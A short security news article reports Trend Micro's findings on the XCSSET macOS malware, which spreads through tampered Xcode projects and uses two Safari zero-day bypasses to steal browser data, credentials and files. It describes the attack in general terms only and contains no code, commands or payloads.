The Xcode projects are exploited to spread a Mac malware that can compromise Safari and other browsers.
The XCSSET malware family has been found in Xcode projects, leading to a rabbit hole of malicious payloads.
According to the security researchers at Trend Micro, an unusual infection in a developer’s project also included the discovery of two zero-day vulnerabilities.
Xcode is a free integrated development environment (IDE) used in macOS for developing Apple-related software and apps.
Even though it is not clear how the XCSSET finds its way into Xcode projects, once embedded, the malware runs when a project is built.
It is presumed that these systems would be primarily used by developers. These Xcode projects have been modified such that upon building, these projects would run a malicious code. This eventually leads to the main XCSSET malware being dropped and run on the affected system.
Several impacted developers have shared their projects on GitHub, which could result in “supply chain-like attacks for users who rely on these repositories as dependencies in their own projects.”
After getting into a vulnerable system, XCSSET grips on browsers including the development version of Safari, using vulnerabilities to steal user data.
In the case of Safari, the first bug is a flaw in Data Vault. A bypass method was found that circumvents the protection macOS puts in place for Safari cookie files via SSHD.
The second vulnerability is due to how Safari WebKit operates. Usually, in order to launch a kit, the user has to submit their password, but a bypass was found that can be used to perform malicious operations via the un-sandboxed Safari browser. It also appears possible to perform Dylib hijacking.
Trend Micro thinks that the UXSS element of the attack chain could be used not only to steal general user information, but also as a means to modify browser sessions to display malicious websites, change cryptocurrency wallet addresses, harvest Apple Store credit card information, and steal credentials from sources including Apple ID, Google, Paypal, and Yandex.
The malware can also steal a variety of other user data, including Evernote content, Notes information, and communication from Skype, Telegram, QQ, and WeChat applications.
Besides, XCSSET can take screenshots, exfiltrate data and send stolen files to a command-and-control (C2) server, and also contains a ransomware module for file encryption and blackmail demand messages.
Only two Xcode projects harboring the malware have been found, together with 380 victim IPs — the majority of which are located in China and India.
The affected developers will unwittingly distribute the malicious Trojan to their users in the form of the compromised Xcode projects, and methods to verify the distributed file (such as checking hashes) would not help as the developers would be unaware that they are distributing malicious files.
Image Credits : MacSecurity